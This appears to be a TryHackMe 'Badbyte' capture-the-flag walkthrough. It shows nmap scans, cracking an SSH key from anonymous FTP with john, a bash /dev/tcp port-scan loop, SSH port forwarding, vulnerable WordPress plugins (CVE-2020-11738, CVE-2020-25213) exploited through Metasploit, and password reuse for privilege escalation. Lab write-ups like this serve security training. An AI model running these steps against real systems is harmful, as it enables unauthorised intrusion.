[THM] : Badbyte Walkthrough
Initial Recon
# Nmap 7.92 scan initiated Sun Feb 5 16:52:37 2023 as: nmap -sV -sC -p - -v -T4 -Pn -oN nmap.txt 10.10.141.79
Warning: 10.10.141.79 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.141.79
Host is up (0.22s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA)
| 256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA)
|_ 256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519)
10758/tcp filtered unknown
18237/tcp filtered unknown
30024/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.6.57
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 1743 Mar 23 2021 id_rsa
|_-rw-r--r-- 1 ftp ftp 78 Mar 23 2021 note.txt
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 5 17:05:05 2023 -- 1 IP address (1 host up) scanned in 747.64 secondsI logged in into ftp and found 2 files id_rsa and note.txt. The note.txt ccontained the username for ssh service. However, during logging in asked for password. I used ssh2john to convert the id_rsa file into hash and cracked using john and logged in.
python2 /usr/share/john/ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash I tried checking for ports listening on localhost but neither netstat nor ss was installed. The machine was empty XD.
I tried uploading some static binary from my machine using ftp, scp but failed. Then, I used following bash script to discover open ports on the remote machine.
for i in {1..65535}; do (echo > /dev/tcp/127.0.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
Then, I port forwarded port 80 using ssh. The application was using Wordpress CMS.
ssh -i id_rsa -L 5656:127.0.0.1:80 errorcauser@10.10.141.79
Then, I performed nmap script scan and found 2 plugins. Googling the plugins version, I found the plugins vulnerable to CVE-2020–11738 and CVE-2020–25213 (unautheticated file read and remote code execution).
nmap -A --script http-wordpress-enum --script-args search-limit=5000 -p 5656 127.0.0.1
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-05 18:53 +0545
Nmap scan report for view-localhost (127.0.0.1)
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
5656/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-wordpress-enum:
| Search limited to top 4778 themes/plugins
| plugins
| duplicator 1.3.26
|_ wp-file-manager 6.0
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.61 seconds
The exploit had a metasploit module. I used it to obtain a shell as user cth.
After enumerating the machine, I found a bash.log file through .viminfo file owned by cth in /var/log file that contained the cth’s old password. I incremented a digit in old password and logged in as user cth. We can see that user cth is able to run any command on the system “badbyte” as any user on any host.
